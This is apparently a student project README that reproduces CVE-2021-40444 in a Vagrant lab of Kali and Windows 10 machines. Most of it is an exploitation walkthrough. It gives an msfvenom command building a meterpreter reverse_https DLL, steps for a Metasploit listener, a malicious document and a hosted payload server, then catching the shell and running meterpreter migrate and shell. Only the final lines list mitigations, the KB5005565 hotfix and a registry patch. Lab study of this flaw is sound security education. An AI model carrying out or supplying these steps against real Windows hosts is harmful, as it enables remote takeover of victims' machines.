# TIC4301_Project
TIC4301 Project - CVE-2021-40444

Download the following vagrant boxes: \
Kali  - \
Win10 -

Import the boxes with the following commands through vagrant:
1. vagrant box add
2. vagrant box add
3. vagrant init
4. vagrant init
5. vagrant up

Setup (win10):
1. In the win10 box, log in as administrator with the password vagrant.
2. Right click script.ps1 on the desktop and run with powershell. (Leave this open)
3. Run ipconfig.exe and obtain the address for this host.

Setup & Exploitation (Kali):
1. cd Desktop/CVE-2021-40444.
2. generate your malicious dll with msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
3. start a listener in metasploit.
4. generate the malicious document. # python3 generate test/shell.dll (kali ip)
5. sudo python3 host 80 (to host your server for the file downloads)
6. visit http://<win 10 IP>/upload and upload the file.
7. listen for the shell.

Further Exploitation:
1. run post/windows/manage/migrate (meterpreter)
2. shell (meterpreter)
1. Install KB5005565 hotfix.
2. Edit windows registry with patch.reg in the repository.